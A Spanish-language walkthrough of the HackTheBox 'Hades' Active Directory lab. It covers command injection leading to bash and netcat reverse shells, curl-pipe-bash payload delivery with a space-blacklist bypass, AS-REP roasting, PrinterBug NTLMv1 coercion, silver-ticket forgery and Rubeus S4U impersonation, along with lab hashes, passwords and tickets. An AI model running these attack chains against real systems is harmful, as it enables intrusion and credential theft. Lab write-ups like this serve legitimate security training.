Writeup HackTheBox Hades

Contenido

Chasm
Guardian
Messenger
Resurrection
Gateway
Celestial
Dominion
Extra 1
Extra 2
Extra 3

HackTheBox

Hades

Chasm

HADES{Fr4gil3_b1aCkli5tiNg}

Iniciamos la máquina escaneando los puertos de la máquina con nmap donde encontramos solo un puerto abierto que es un servicio web por https

❯ nmap 10.13.38.16
Nmap scan report for 10.13.38.16  
PORT    STATE SERVICE
443/tcp open  https

Podemos ver una página web que de primeras no parece tener nada realmente interesante, aunque en la parte superior encontramos varias pestañas con funciones

Hay una pestaña SSL TOOLS la cual tiene un checker de certificados ssl, en donde puedes checkear el certificado de una dirección ip o dominio con un servicio https

Usando mitmdump podemos estar en escucha por el puerto 443 de las peticiones que emite contra el certificado para capturar algo de información de la petición

❯ sudo mitmdump -p 443 --mode reverse:https://10.13.38.16 --ssl-insecure --set flow_detail=2  
reverse proxy to https://10.13.38.16 listening at *:443.

Ahora en la web hacemos que emita el check contra nuestra direccion ip de la vpn

Mitdump nos reporta varias cosas de la petición capturada entre ellas la cabecera User-Agent que es curl/7.58.0, la petición ha sido emitida desde un comando

❯ sudo mitmdump -p 443 --mode reverse:https://10.13.38.16 --ssl-insecure --set flow_detail=2  
reverse proxy to https://10.13.38.16 listening at *:443.
[10.13.38.15:58110] client connect
[10.13.38.15:58110] server connect 10.13.38.16:443
10.13.38.16:49511: GET https://10.13.38.16/
    Host: 10.13.38.16
    User-Agent: curl/7.58.0
    Accept: */*
 << 200 OK 14.3k
    Date: Thu, 27 Apr 2023 03:11:12 GMT
    Server: Apache/2.4.29 (Ubuntu)
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    Last-Modified: Thu, 05 Sep 2019 15:58:47 GMT
    ETag: "3960-591d0659f7d83"
    Accept-Ranges: bytes
    Content-Length: 14688
    Vary: Accept-Encoding
    Content-Type: text/html
[10.13.38.16:49511] client disconnect
[10.13.38.16:49511] server disconnect 10.13.38.16:443

Podemos agregar un $(id) en la dirección web de nuestro servidor, asi si se ejecuta el comando id este nos devolvera el output con el usuario que lo ha ejecutado

En la petición pordemos ver que ha intentado hacer una petición a nuestra ip en el recurso uid=33(www-data) que es el resultado del comando id ejecutado

❯ sudo mitmdump -p 443 --mode reverse:https://10.13.38.16 --ssl-insecure --set flow_detail=1  
reverse proxy to https://10.13.38.16 listening at *:443.
[10.13.38.16:49550] client connect
[10.13.38.16:49550] server connect 10.13.38.16:443
10.13.38.16:49550: GET https://10.13.38.16/uid=33(www-data)
                << 404 Not Found 274b
[10.13.38.16:49550] client disconnect
[10.13.38.16:49550] server disconnect 10.13.38.16:443

Para obtener una shell en la máquina crearemos un archivo index.html que tenga una revshell en bash, y lo compartiremos a traves de un servidor http de python

❯ cat index.html
bash -i >& /dev/tcp/10.10.14.10/443 0>&1

❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  

Despues de probar la ejecucion normal notamos que hay una blacklist con algunos caracteres incluido el espacio, pero podemos cambiar el espacio por un ${IFS}

10.14.10/$(curl 10.10.14.10 | bash)

10.14.10/$(curl${IFS}10.10.14.10|bash)  

Al enviar la petición cargara nuestro index.html con la revshell y al ejecutarla con bash recibimos una shell como www-data donde encontramos la primera flag

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.16
www-data@cee1146c7ac1:~/html/ssltools$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cee1146c7ac1:~/html/ssltools$ hostname -I
172.17.0.2
www-data@cee1146c7ac1:~/html/ssltools$ ls
0fe092ba0_flag.txt  certificate.php  logo.png
www-data@cee1146c7ac1:~/html/ssltools$ cat 0fe092ba0_flag.txt  
HADES{Fr4gil3_b1aCkli5tiNg}
www-data@cee1146c7ac1:~/html/ssltools$

Guardian

HADES{DoNt_d1s4ble_K3rbeRos_Pre_aUth3nticat1on}

Parece que estamos en un contenedor de docker, nuestra direccion ip es la .2 al probar credenciales defecto en la .1 podemos ingresar como el usuario docker

www-data@cee1146c7ac1:~$ ssh docker@172.17.0.1
docker@172.17.0.1's password: tcuser
   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.  
 (/-_--_-\)           www.tinycorelinux.net

docker@default:~$ id
uid=1000(docker) gid=50(staff) groups=50(staff),100(docker)
docker@default:~$

Tenemos ALL en privilegios de sudoers, con un sudo su nos convertimos en root

docker@default:~$ sudo su
root@default:~# id
uid=0(root) gid=0(root) groups=0(root)  
root@default:~#

En las interfaces de red de este contenedor podemos encontrar 5 direcciones diferentes, entre ellas una que llama la atención es la eth1 con el 192.168.99.100

root@default:~# ifconfig
docker0   Link encap:Ethernet  HWaddr 02:42:57:6D:1C:4B
          inet addr:172.17.0.1  Bcast:172.17.255.255  Mask:255.255.0.0
          inet6 addr: fe80::42:57ff:fe6d:1c4b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5276 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6767 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:483614 (472.2 KiB)  TX bytes:9003824 (8.5 MiB)

eth0      Link encap:Ethernet  HWaddr 08:00:27:20:AF:32
          inet addr:10.0.2.15  Bcast:10.0.2.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe20:af32/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:16931 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6608 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:18015028 (17.1 MiB)  TX bytes:709915 (693.2 KiB)

eth1      Link encap:Ethernet  HWaddr 08:00:27:E6:B0:30
          inet addr:192.168.99.100  Bcast:192.168.99.255  Mask:255.255.255.0  
          inet6 addr: fe80::a00:27ff:fee6:b030/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:445 errors:0 dropped:0 overruns:0 frame:0
          TX packets:472 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:75865 (74.0 KiB)  TX bytes:221543 (216.3 KiB)

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

veth9d30111 Link encap:Ethernet  HWaddr BA:FE:39:D2:E9:6D
          inet6 addr: fe80::b8fe:39ff:fed2:e96d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:5276 errors:0 dropped:0 overruns:0 frame:0
          TX packets:6781 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:557478 (544.4 KiB)  TX bytes:9004900 (8.5 MiB)

root@default:~#

Sabemos que estamos en un lab de AD asi que con un binario estatico de nmap buscamos direcciones con el puerto SMB sobre la 182.168.*.*, encontramos 3

root@default:~# ./nmap -v -T5 -Pn -n -p 445 --open 192.168.*.*/24  
Nmap scan report for 192.168.3.201
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.168.3.202
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for 192.168.3.203
PORT    STATE SERVICE
445/tcp open  microsoft-ds
root@default:~#

Podemos aplicar un escaneo un poco mas largo para descubrir todos los puertos abiertos en cada uno de los 3 hosts windows que hemos encontrado anteriormente

root@default:~# ./nmap -T5 -Pn -n 192.168.3.201-203
Nmap scan report for 192.168.3.201
PORT     STATE SERVICE
135/tcp  open  loc-srv
445/tcp  open  microsoft-ds
5985/tcp open  unknown

Nmap scan report for 192.168.3.202
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  loc-srv
443/tcp  open  https
445/tcp  open  microsoft-ds
5985/tcp open  unknown

Nmap scan report for 192.168.3.203
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  loc-srv
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5985/tcp open  unknown
root@default:~#

Para tener conexion desde nuestro equipo podemos usar ligolo-ng usando el agent para conectarnos a nuestro equipo por el puerto 11601 que nos marca el proxy

root@default:~# ./agent -connect 10.10.14.10:11601 -ignore-cert &
WARN[0000] warning, certificate validation disabled
INFO[0000] Connection established                 addr="10.10.14.10:11601"  
root@default:~#

En el proxy obtenemos una sesión, la indicamos e iniciamos el tunel con start

❯ ./proxy -selfcert
WARN[0000] Using automatically generated self-signed certificates (Not recommended)  
INFO[0000] Listening on 0.0.0.0:11601
    __    _             __
   / /   (_)___ _____  / /___        ____  ____ _
  / /   / / __ `/ __ \/ / __ \______/ __ \/ __ `/
 / /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/     /_/ /_/\__, /
        /____/                          /____/

Made in France ♥ by @Nicocha30!

ligolo-ng »
INFO[0005] Agent joined.               name=root@default remote="10.13.38.16:49747"
ligolo-ng » session
? Specify a session : 1 - root@default - 10.13.38.16:49747
[Agent : root@default] » start
INFO[0021] Starting tunnel to root@default
[Agent : root@default] »

Agregamos el segmento 192.168.3.0/24 a la interfaz de ligolo y ahora tenemos conexión con todos los equipos del dominio, podemos comprobarlo con un ping

❯ sudo ip route add 192.168.3.0/24 dev ligolo

❯ ping -c1 -w1 192.168.3.203
PING 192.168.3.203 (192.168.3.203) 56(84) bytes of data.
64 bytes from 192.168.3.203: icmp_seq=1 ttl=64 time=169 ms

--- 192.168.3.203 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms  
rtt min/avg/max/mdev = 169.346/169.346/169.346/0.000 ms

Despues de configurar ligolo logramos tener conexión con los tres equipos windows, con crackmapexec podemos ver los nombres de equipos DEV, WEB y DC1

❯ crackmapexec smb 192.168.3.201-203
SMB         192.168.3.201   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)
SMB         192.168.3.202   445    WEB              [*] Windows Server 2012 R2 Standard 9600 x64 (name:WEB) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         192.168.3.203   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)

Por comodidad y posibles proximos ataques agregaremos al archivo /etc/hosts las direcciones ip con su dominio que sera el hostname y el dominio htb.local

❯ tail -n3 /etc/hosts
168.3.201 dev.htb.local
168.3.202 web.htb.local
168.3.203 dc1.htb.local htb.local  

Usando kerbrute podemos enumerar usuarios hacia el DC aplicando fuerza bruta

❯ kerbrute userenum -d htb.local --dc dc1.htb.local /usr/share/seclists/Usernames/Names/names.txt  
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

>  Using KDC(s):
>  	192.168.3.203:88

>  [+] VALID USERNAME:	 bob@htb.local
>  [+] VALID USERNAME:	 dev@htb.local

Guardamos ambos usuarios encontrados en un archivo users.txt y con GetNPUsers intentamos un ASREPRoast hacia ambos, el usuario bob nos devuelve un hash

❯ impacket-GetNPUsers htb.local/dc1.htb.local -no-pass -usersfile users.txt  
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$bob@HTB.LOCAL:be52854293467eeb1900407ac6fef3ef$af612e3bbe242084e7095bb1bac4a6d6fa5b6607bc348655bd5ab20c057e17c21f785963c03c3207b33ee9a6d6f984ce01cad6e5416826a9fb5327fdf3853cb7c94151251445f533fbdab291d569a68c8ef1a44c807acbb424985f3274d9492656868d3922d25a744c3bbdc4deb543064ba4964175a4238ac1dcff471b890e254526b5bd4836281406cb2c927e26b17288e909be954dd0008b4ce998bc77cfd0795c8f50b56948adf24ab8f9ee9461e80f2e91178c1310fe1f1a8ceaaafe2b8d48393d9d20aeed3bd1966aadcdf2e4309dc1f774b7b6a195fc0a135c782cf2e9ec6b0108f73e  
[-] User dev doesn't have UF_DONT_REQUIRE_PREAUTH set

Con john podemos romper facilmente el hash de bob, obtenemos su contraseña

❯ john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 XOP 4x2])  
Press 'q' or Ctrl-C to abort, almost any other key for status
Passw0rd1!       ($krb5asrep$23$bob@HTB.LOCAL)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Las validamos con crackmapexec y listando recursos compartidos a nivel de smb en DC1 podemos ver que ahora tenemos privilegios de lectura en el recurso Users

❯ crackmapexec smb dc1.htb.local -u bob -p Passw0rd1! --shares
SMB         dc1.htb.local   445    DC1              [*] Windows 10.0 Build 17763 x64 (name:DC1) (domain:htb.local) (signing:True) (SMBv1:False)  
SMB         dc1.htb.local   445    DC1              [+] htb.local\bob:Passw0rd1! 
SMB         dc1.htb.local   445    DC1              [+] Enumerated shares
SMB         dc1.htb.local   445    DC1              Share           Permissions     Remark
SMB         dc1.htb.local   445    DC1              -----           -----------     ------
SMB         dc1.htb.local   445    DC1              ADMIN$                          Remote Admin
SMB         dc1.htb.local   445    DC1              C$                              Default share
SMB         dc1.htb.local   445    DC1              IPC$            READ            Remote IPC
SMB         dc1.htb.local   445    DC1              NETLOGON        READ            Logon server share 
SMB         dc1.htb.local   445    DC1              SYSVOL          READ            Logon server share 
SMB         dc1.htb.local   445    DC1              Users           READ

Simplemente nos conectamos con smbclient, dentro de Users encontramos un directorio bob con la flag.txt dentro, ahora la descargamos con get y la leemos

❯ impacket-smbclient htb.local/bob:'Passw0rd1!'@dc1.htb.local  
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Users
# ls
drw-rw-rw-          0  Fri Sep  6 05:50:58 2019 .
drw-rw-rw-          0  Fri Sep  6 05:50:58 2019 ..
drw-rw-rw-          0  Fri Sep  6 06:10:00 2019 bob
# cd bob
# ls
drw-rw-rw-          0  Fri Sep  6 06:10:00 2019 .
drw-rw-rw-          0  Fri Sep  6 06:10:00 2019 ..
-rw-rw-rw-         47  Fri Sep  6 06:10:54 2019 flag.txt
# get flag.txt
# exit

❯ cat flag.txt
HADES{DoNt_d1s4ble_K3rbeRos_Pre_aUth3nticat1on}

Messenger

HADES{Sp0ol_SeRv1ce_sO_Brok3n}

Listando algunos servicios con rcpdump podemos encontrar que esta corriendo uno bastante conocido que es el servicio MS-RPRN que pertenece a spoolsv.exe

❯ impacket-rpcdump htb.local/bob:'Passw0rd1!'@dev.htb.local | grep MS-RPRN -A2  
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0

Para adaptarnos a crackers mas conocidos que tiran de tablas precomputadas como crack.sh el Challenge de responder lo modificaremos a 1122334455667788

❯ grep Challenge /etc/responder/Responder.conf  
Challenge = 1122334455667788

Ahora con responder nos ponemos en escucha de trafico indicando la interfaz tun0 y con el parametro --lm para forzar el downgrade hacia las versiones antiguas

❯ sudo responder -I tun0 --lm
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|  
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

[+] Listening for events...

Usaremos pringerbug con las credenciales que tenemos de antes y sabemos son validas en el dominio para via RPC nos haga una petición a nuestro host

❯ python3 printerbug.py htb.local/bob:'Passw0rd1!'@dev.htb.local 10.10.14.10
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Attempting to trigger authentication via rprn RPC at dev.htb.local
[*] Bind OK
[*] Got handle
RPRN SessionError: code: 0x6ba - RPC_S_SERVER_UNAVAILABLE - The RPC server is unavailable.  
[*] Triggered RPC backconnect, this may or may not have worked

Volvemos al responder en escucha y podemos ver que el equipo DEV$ ha realizado una autenticación hacia nuestro host y recibimos su hash en el formato NTLMv1

❯ sudo responder -I tun0 --lm
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

[+] Listening for events...

[SMB] NTLMv1 Client   : 10.13.38.17
[SMB] NTLMv1 Username : HTB\DEV$
[SMB] NTLMv1 Hash     : DEV$::HTB:A7509E055B9C053829A4802EA4DB0F1A9622805EF63409D5:A7509E055B9C053829A4802EA4DB0F1A9622805EF63409D5:1122334455667788  

Ya que la fuerza bruta probablemente nos tomaria dias, tiraremos de crack.sh, indicandole nuestro correo y pasandole nuestro hash en el siguiente formato

NTHASH:A7509E055B9C053829A4802EA4DB0F1A9622805EF63409D5

Pasados unos minutos recibiremos un correo de crack.sh con los resultados de la petición, donde ha logrado conseguir el hash NT con nuestro input que enviamos

Podemos comprobar con crackmapexec que el hash NT que recibimos es valido para autenticarnos contra el ordenador DEV$ perteneciente al dominio htb.local

❯ crackmapexec smb dev.htb.local -u DEV$ -H 01300a3009c7ae1af0ea216ebada48ad
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] htb.local\DEV$:01300a3009c7ae1af0ea216ebada48ad

Sin embargo no nos devuelve un Pwn3d!, ahora vamos mediante un silver ticket suplantar a Administrator, para ello antes necesitamos obtener el SID del dominio

❯ impacket-getPac htb.local/bob:Passw0rd1! -targetUser bob | grep SID  
Domain SID: S-1-5-21-4266912945-3985045794-2943778634

Ahora con el SID y el hash crearemos un nuevo ticket con ticketer para el spn cifs de dev suplantando a Administrator, lo exportamos para autenticarnos con el

❯ impacket-ticketer -nthash 01300a3009c7ae1af0ea216ebada48ad -domain-sid S-1-5-21-4266912945-3985045794-2943778634 -domain htb.local -spn cifs/dev.htb.local Administrator  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for htb.local/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in Administrator.ccache

❯ export KRB5CCNAME=Administrator.ccache

Con crackmapexec comprobamos la autenticación con el ticket y nos devuelve Pwn3d! sin embargo no tenemos privilegios de escritura en recursos SMB por lo que no podremos conseguir una shell utilizando herramientas como psexec

❯ crackmapexec smb dev.htb.local -k --use-kcache
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] htb.local\ from ccache (Pwn3d!)

❯ crackmapexec smb dev.htb.local -k --use-kcache --shares
SMB         dev.htb.local   445    DEV              [*] Windows Server 2019 Standard 17763 x64 (name:DEV) (domain:htb.local) (signing:False) (SMBv1:True)  
SMB         dev.htb.local   445    DEV              [+] htb.local\ from ccache (Pwn3d!)
SMB         dev.htb.local   445    DEV              [+] Enumerated shares
SMB         dev.htb.local   445    DEV              Share           Permissions     Remark
SMB         dev.htb.local   445    DEV              -----           -----------     ------
SMB         dev.htb.local   445    DEV              IPC$                            Remote IPC

Si intentamos dumpear la sam con secretsdump nos devuelve un pequeño error

❯ impacket-secretsdump dev.htb.local -k -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0xe4b2298c95677ce18cd2198b9a36c7df
[-] SAM hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)  
[-] LSA hashes extraction failed: SMB SessionError: STATUS_BAD_NETWORK_NAME({Network Name Not Found} The specified share name cannot be found on the remote server.)  
[*] Cleaning up...

Como vimos en la máquina resolute el que crackmapexec devuelva Pwn3d! devuelve de los privilegios a nivel de servicios y no de recursos smb, asi que tiraremos de ahi

try:
    # 0xF003F - SC_MANAGER_ALL_ACCESS
    # http://msdn.microsoft.com/en-us/library/windows/desktop/ms685981(v=vs.85).aspx
    ans = scmr.hROpenSCManagerW(dce,'{}\x00'.format(self.host),'ServicesActive\x00', 0xF003F)  
    self.admin_privs = True
except scmr.DCERPCException as e:
    self.admin_privs = False
    pass

Podemos hacer uso de services para crear un nuevo servicio llamado netcat el cual ejecutara un curl a nuestro host para descargar el netcat.exe en la maquina

❯ impacket-services dev.htb.local -k -no-pass create -name netcat -display netcat -path 'curl 10.10.14.10/netcat.exe -o C:\ProgramData\netcat.exe'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating service netcat

Ahora usamos la funcion start para correr el servicio netcat que creamos antes

❯ impacket-services dev.htb.local -k -no-pass start -name netcat  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Starting service netcat

Al hacerlo recibimos una petición del netcat.exe en nuestra maquina lo que quiere decir que se descargo el netcat y que ejecutamos comandos en la maquina dev

❯ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...  
10.13.38.17 - - "GET /netcat.exe HTTP/1.1" 200 -

Ahora creamos un servicio llamado shell el cual ejecute el netcat.exe para enviarnos una powershell a nuestro host por el puerto 443, despues lo corremos

❯ impacket-services dev.htb.local -k -no-pass create -name shell -display shell -path 'C:\ProgramData\netcat.exe 10.10.14.10 443 -e powershell'  
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating service shell

❯ impacket-services dev.htb.local -k -no-pass start -name shell   
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Starting service shell

Al correr el servicio recibimos una powershell en la máquina DEV como el usuario nt authority\system que es el que tiene maximos privilegios sobre el sistema

❯ sudo netcat -lvnp 443
Listening on 0.0.0.0 443
Connection received on 10.13.38.17
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.  

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>

Otra forma de conseguir una sesion en DEV$ es usar Rubeus, nos pasamos a un windows y en una powershell indicamos que redirija todas las peticiones hacia la red 192.168.3.0 hacia 192.168.100.85 que es el linux que tiene conexion

PS C:\Users\pc1\Desktop> route add 192.168.3.0 MASK 255.255.255.0 192.168.100.85  
Correcto
PS C:\Users\pc1\Desktop>

Ahora para evitar problemas añadiremos todas las direcciones de los ordenadores que forman parte del dominio htb.local al archivos hosts de nuestro windows

Volviendo al powershell, con Rubeus indicaremos el hash del ordenador DEV$ suplantando al usuario Administrator, al hacerlo se nos importa un nuevo ticket

PS C:\Users\pc1\Desktop> .\Rubeus.exe s4u /user:DEV$ /rc4:01300a3009c7ae1af0ea216ebada48ad /impersonateuser:Administrator /altservice:http/dev.htb.local /domain:htb.local /dc:dc1.htb.local /self /ptt  

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Using rc4_hmac hash: 01300a3009c7ae1af0ea216ebada48ad
[*] Building AS-REQ (w/ preauth) for: 'htb.local\DEV$'
[*] Using domain controller: 192.168.3.203:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIEqDCCBKSgAwIBBaEDAgEWooIDyjCCA8ZhggPCMIIDvqADAgEFoQsbCUhUQi5MT0NBTKIeMBygAwIB
      AqEVMBMbBmtyYnRndBsJaHRiLmxvY2Fso4IDiDCCA4SgAwIBEqEDAgECooIDdgSCA3JKyHcUrYMJcYfs
      QxvIvmpxxBOfF22g1CmzCoOGGyB7AlV47xpLdnHpOCOuEbVyXp0lPo00JpROPl8dB7ecHXAaJeR2s6GP
      Pps2OS0FZyYUPaifSBm/ZPgaoADahq6D/PEpUDgGNFYeT6KDVja6SDJDrIFBRIW7+VWB6KTL0XLityM3
      7xSZDGtiWslaIPvNG7I2w0mXBKfAY4bDKBCxtMQUZTzk9EF8mBd1Kf1CLek/Lc/BqkvWofbY8MWnj4DA
      0DOCGr5olBHujVQ5rXNrwaNACn3Tfui2s2/pAXoFLvEqTC3j7SmbWRUndRplfXyesCoOrIo/cg6Nti75
      6++YWoU6vXIPcGCdJKcjhTtMszlB9R6wPhn2HoeSrWP17XsL+zxPwdKBHz6IbE9Q7OQzjFoGZCYuT4Os
      n36YJm9O3KnnwUv3TBUO4epeE8Qp6skJln8vHqWrsVC/VS85dmP31QzWmdGy1TN05T7Z/7poXGjZwhmG
      0wVoqQ+9gJV+DsLUvdl9A0UMUQdySfrKF5wA4uZmg+FEen+itP+Vd39uXCkGJqWxpH07LHMhsZW5zVHk
      lNJYKKglVcJVuOE7G/YgNg/e5yvt3Gg8dgSHYBna1EnUyPe7E1QDEFLJRKsee4Lve0amVErHUzRW94MV
      q3PIOL09hE4ZvcI0YsCMibAufegMZjzEFv1FoW70i+B+YLa6NcbBvuwVK8QdKmzdXbWXB10DAiaBYvCC
      d04m/KHTS0Utmi2llW2Ka6Pcs0cAHNJuAVkuAhZS6dAmvWJLlIkkYgOggKFVCPn0N2E1u4Z4EEp65hI5
      rBVsoBmXN9usCORL3ViQKB8NSLQ5y+RKfOKIWCxy/DWIawJqeiXQ/eRiMmeEKQfVpg4dWiDSa/LU44Gj
      KZcXabRyDQM4/yLPH3sllZB6PTya046RHOlyyyyBWO+NaqGoMUG7ZTUcTzw+F/OUtB8GlfSr+0yKq1R9
      RiHBEtRPbEhzb20X6MLsi7M1ESa1lCmfTwx58ZD8lfr8ZctSec33EsWATr/adAnxPxPSez9T587KVq6/
      z1uRfZn/O2/lNPtcUxERlEhpY2/+qBZTFQuB6lqV4S+ewtLi6KCtmOdPeqsyBz+sJSJkUdWh0dL4i6+o
      LAoseAmPd8vRyNlHWGnS4ArqnoCUt/drUSXIalwmo0ujgckwgcagAwIBAKKBvgSBu32BuDCBtaCBsjCB
      rzCBrKAbMBmgAwIBF6ESBBBw/o7YqKq6gSfGuv70LH4poQsbCUhUQi5MT0NBTKIRMA+gAwIBAaEIMAYb
      BERFViSjBwMFAEDhAAClERgPMjAyMzA0MzAwMzI4MDFaphEYDzIwMjMwNDMwMTMyODAxWqcRGA8yMDIz
      MDUwNzAzMjgwMVqoCxsJSFRCLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlodGIubG9jYWw=


[*] Action: S4U

[*] Building S4U2self request for: 'DEV$@HTB.LOCAL'
[*] Using domain controller: dc1.htb.local (192.168.3.203)
[*] Sending S4U2self request to 192.168.3.203:88
[+] S4U2self success!
[*] Substituting alternative service name 'http/dev.htb.local'
[*] Got a TGS for 'administrator' to 'http@HTB.LOCAL'
[*] base64(ticket.kirbi):

      doIFXjCCBVqgAwIBBaEDAgEWooIEZTCCBGFhggRdMIIEWaADAgEFoQsbCUhUQi5MT0NBTKIgMB6gAwIB
      AaEXMBUbBGh0dHAbDWRldi5odGIubG9jYWyjggQhMIIEHaADAgESoQMCAQeiggQPBIIEC54azxOCgCG1
      w96Bc6TrM/dBqTSNvwfFAupxumsLYdMU6sTVcsB0nFBfhGwvFrjzw/Hl8nNnWjGYq5T7k68v75Ha3vIi
      2hv/2lMwOmAL/+3s0bywlsIB1NOVQojLTVp/DvVrT6a/b35kSUE40FxEjjj9Bwqps8L+hYoKX5MfSZZN
      Kv5vApyYOTiTqXEOf9ZraY2MidY3HjhHcWYSXOwaDaN4BeuQlzsR2hbuttw6kudQUw0duibXKNg3dz6D
      Pat+XGYsphghc41qVJUujKWgahW8Y1B20+NUYwJR61OKS4bU0URenimt143szOKD78PPBksgB4hBp0ca
      AUeM9GXG2OKhKGrqT3YHod51vFFievSo6uHRSeAXa4g+zp0RPgDDTIzQi99715sUhu6EfQIMIht8eiRc
      6c5zNETD0HXPGPdEf/8uKEyX8sg7vgEUrHCslB2U4pHEltQXpxxkUjCs4mw2CJkaun5HbeFQ7SofOYBP
      FqFGfUrv+MijzG+aLRzJ3ACgtLHW+YR3zKM+ZN+okrReT6GhVZZQxgcXJR0cuHbehbORV6DyJvZd7nnd
      Kq/iKh2jR5fh1zJLdkZSMO8tOPUzhV9SvznGJj0TOMzpfzAXZ4P4wPGnRSNtmZP76/7C98XnzzrJousO
      fRD3EVyLhglHNQd1WbARIX44ExY7cHTLlGQRnJUQ95okVmpGJgTO2/NOXkP3cJitiqYQKDgnmAqjfLwa
      5VFncZ5ABQgIS7vjxF6kkAYfReNqKY8TaNtH5I1g9GYJ7Qm4KwqAbGVClh0aayz69f+geiDLP7PES3E9
      GFgD9ko4wKqyvNGZsEVsSkQgxq98NUmAmKOu4KBprVC8r6/jO8yqFbAXUR0MwoT0Yjb8tDTsEbw23iBD
      JEOZqcufDtqqrENavVkt6AKAUk+lT0JvXJYH6aJFw6O6Np7QDW3u8k04d2+epuWOPYAmZe7hsC6u9Y/8
